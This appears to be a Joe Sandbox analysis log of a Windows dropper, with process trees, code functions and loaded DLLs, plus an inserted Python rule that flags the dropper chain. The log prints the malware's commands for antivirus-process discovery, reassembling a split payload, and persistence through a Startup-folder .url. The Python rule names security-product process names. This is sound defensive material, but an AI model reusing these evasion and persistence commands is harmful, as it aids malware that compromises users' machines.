      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004B0BE0
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004CCD51
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004FEDB2
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_00508E44
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_00520EB7
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004D6FE6
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004AB020
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004C33B7
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004BD45D
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004CF409
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004A94E0
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004A1663
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004BF628
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004AF6A0
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004C16B4
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004C78C3
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004C1BA8
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004CDBA5
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004D9CE5
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004A9C80
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004BDD28
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004C1FC0
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004CBFD6
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001A23F5
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_00208400
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001B6502
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001B265E
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_0018E6F0
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001A282A
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001B89BF
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_00200A3A
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001B6A74
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_00190BE0
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001ACD51
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001DEDB2
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001E8E44
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_00200EB7
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001B6FE6
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_0018B020
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001A33B7
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001AF409
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_0019D45D
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001894E0
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_0019F628
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_00181663
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001A16B4
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_0018F6A0
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001A78C3
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001A1BA8
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001ADBA5
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_00189C80
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001B9CE5
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_0019DD28
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001ABFD6
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001A1FC0
      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
      Source: C:\Users\user\Desktop\InsertSr.exe | Code function: String function: 004062A3 appears 58 times
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: String function: 00191A36 appears 34 times
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: String function: 001A8B30 appears 42 times
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: String function: 001A0D17 appears 70 times
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: String function: 004C8B30 appears 42 times
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: String function: 004C0D17 appears 70 times
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: String function: 004B1A36 appears 34 times
      Source: InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAutoIt3.exeB vs InsertSr.exe
      Source: InsertSr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@32/21@3/6
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_0050A6AD GetLastError,FormatMessageW
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004F8DE9 AdjustTokenPrivileges,CloseHandle
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004F9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001D8DE9 AdjustTokenPrivileges,CloseHandle
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001D9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
      Source: C:\Users\user\Desktop\InsertSr.exe | Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_00504148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
      Source: C:\Users\user\Desktop\InsertSr.exe | Code function: 0_2_004024FB CoCreateInstance
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_0050443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | File created: C:\Users\user\AppData\Local\Immersive Creations Co
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4152:120:WilError_03
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2120:120:WilError_03
      Source: C:\Users\user\Desktop\InsertSr.exe | File created: C:\Users\user\AppData\Local\Temp\nsc9DBC.tmp
      Source: C:\Users\user\Desktop\InsertSr.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat
      Source: InsertSr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\InsertSr.exe | File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\InsertSr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: InsertSr.exe | ReversingLabs: Detection: 15%
      Source: C:\Users\user\Desktop\InsertSr.exe | File read: C:\Users\user\Desktop\InsertSr.exe
      Source: unknown | Process created: C:\Users\user\Desktop\InsertSr.exe "C:\Users\user\Desktop\InsertSr.exe"
      Source: C:\Users\user\Desktop\InsertSr.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 316094
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "SequenceOctoberContributionRef" Recreation
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Metres + ..\Scientists + ..\Prep + ..\Responsible + ..\Stranger + ..\Components + ..\Medium + ..\Ima + ..\My + ..\Indiana u
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif Intranet.pif u
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url" & echo URL="C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url" & exit
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js"
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr" "C:\Users\user\AppData\Local\Immersive Creations Co\D"
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Process created: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
      Source: C:\Windows\SysWOW64\tasklist.exe | Process created: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr"
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Process created: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr"
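The process tree above is a textbook batch-dropper chain: tasklist piped into findstr /I for security-product process names, an extensionless file copied to .bat and run, copy /b reassembly of the split payload, a .pif started from %TEMP%, choice /d y /t used as a sleep, a .url echoed into the Startup folder, and wscript.exe finally launching the .scr. The Python below is an added worked example, not part of the Joe Sandbox report or of the analysed sample: it tags constructed process-creation events whose command lines are copied from the tree above and aggregates the tags into a verdict. The event field names, the tag names, the AV token list (taken from the two findstr command lines) and the "three or more distinct tags" threshold are assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Process names the batch script greps for with "tasklist | findstr" (from the report's command lines).
AV_PROCESS_TOKENS = {"wrsa", "opssvc", "avastui", "avgui", "bdservicehost", "nswscsvc", "sophoshealth"}


@dataclass
class ProcEvent:
    """One process-creation event; field names are this example's own, not a particular EDR schema."""
    parent_image: str
    image: str
    cmdline: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> set:
    """Return the set of behaviour tags a single event matches (tag names are this example's own)."""
    tags = set()
    img, parent = _basename(ev.image), _basename(ev.parent_image)
    low = ev.cmdline.lower()

    # findstr /I or -I "<names>" after tasklist: case-insensitive security-product discovery
    if img == "findstr.exe" and re.search(r"(?:/|-)i\b", low):
        words = {w.lower() for q in re.findall(r'"([^"]*)"', ev.cmdline) for w in q.split()}
        if words & AV_PROCESS_TOKENS:
            tags.add("av_process_discovery")
    # copy <name> <name>.bat: an extensionless file given a batch extension right before execution
    if img == "cmd.exe" and re.search(r"\bcopy\s+(\S+)\s+\1\.bat\b", low):
        tags.add("copy_rename_to_bat")
    # copy /b a + b + c out: binary concatenation of split payload chunks
    if img == "cmd.exe" and re.search(r"\bcopy\s+/b\b.*\+", low):
        tags.add("chunk_reassembly")
    # choice /d y /t N: a sleep built from a stock utility
    if img == "choice.exe" and re.search(r"/t\s+\d+", low):
        tags.add("sleep_via_choice")
    # a .pif (legacy shortcut extension that still runs PE files) started out of %TEMP%
    if img.endswith(".pif") and "\\appdata\\local\\temp\\" in ev.image.lower():
        tags.add("pif_from_temp")
    # echo [InternetShortcut] ... > <Startup>\x.url: persistence through a Startup-folder .url
    if "[internetshortcut]" in low and "\\start menu\\programs\\startup\\" in low:
        tags.add("startup_url_persistence")
    # wscript.exe starting a .scr: the persisted script launching the dropped binary
    if parent == "wscript.exe" and img.endswith(".scr"):
        tags.add("wscript_launches_scr")
    return tags


def triage(events) -> tuple:
    """Aggregate tags over a process tree; three or more distinct tags is this example's threshold."""
    hits = {}
    for ev in events:
        for tag in classify(ev):
            hits.setdefault(tag, []).append(ev.cmdline)
    return ("suspicious_dropper_chain" if len(hits) >= 3 else "no_chain"), hits


# Constructed sample events, with command lines copied from the process tree in the report.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\InsertSr.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "wrsa opssvc"'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\findstr.exe",
              'findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r"cmd /c copy /b ..\Metres + ..\Scientists + ..\Prep + ..\Responsible + ..\Stranger"
              r" + ..\Components + ..\Medium + ..\Ima + ..\My + ..\Indiana u"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Users\user\AppData\Local\Temp\316094\Intranet.pif",
              "Intranet.pif u"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\choice.exe", "choice /d y /t 5"),
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\316094\Intranet.pif", r"C:\Windows\SysWOW64\cmd.exe",
              r'cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu'
              r'\Programs\Startup\Virtuoso.url" & echo URL="C:\Users\user\AppData\Local\Immersive Creations Co'
              r'\Virtuoso.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
              r'\Virtuoso.url" & exit'),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr",
              r'"C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr" '
              r'"C:\Users\user\AppData\Local\Immersive Creations Co\D"'),
]
# Constructed control: an ordinary findstr invocation that must not trip the discovery rule.
BENIGN_EVENT = ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\findstr.exe",
                         'findstr /I "error warning" app.log')

if __name__ == "__main__":
    verdict, hits = triage(SAMPLE_EVENTS)
    print(verdict, sorted(hits))
```

Each rule on its own is weak (findstr /I is common, choice /t is used in legitimate scripts), which is why the verdict is taken over the whole tree rather than per event; the two findstr lines each match the discovery rule because the AV names are matched as whole words inside the quoted argument, so adding a product name to AV_PROCESS_TOKENS is all that is needed to track a new variant.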
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: version.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: shfolder.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: iconcodecservice.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: windowscodecs.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: riched20.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: usp10.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: msls31.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: textinputframework.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: coreuicomponents.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: coremessaging.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: textshaping.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: edputil.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: appresolver.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: bcp47langs.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: slc.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: sppc.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Users\user\Desktop\InsertSr.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: wsock32.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: winmm.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: wininet.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: iphlpapi.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: ntmarta.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: napinsp.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: pnrpnsp.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: wshbth.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: nlaapi.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: mswsock.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: dnsapi.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: winrnr.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: rasadhlp.dll
      Source: C:\Windows\SysWOW64\choice.exe | Section loaded: version.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: wsock32.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: version.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: winmm.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: wininet.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: iphlpapi.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: napinsp.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: pnrpnsp.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: wshbth.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: nlaapi.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: mswsock.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: dnsapi.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: winrnr.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: rasadhlp.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: winmm.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: powrprof.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: umpdc.dll
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Section loaded: mswsock.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: winmm.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: powrprof.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: umpdc.dll
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Section loaded: mswsock.dll
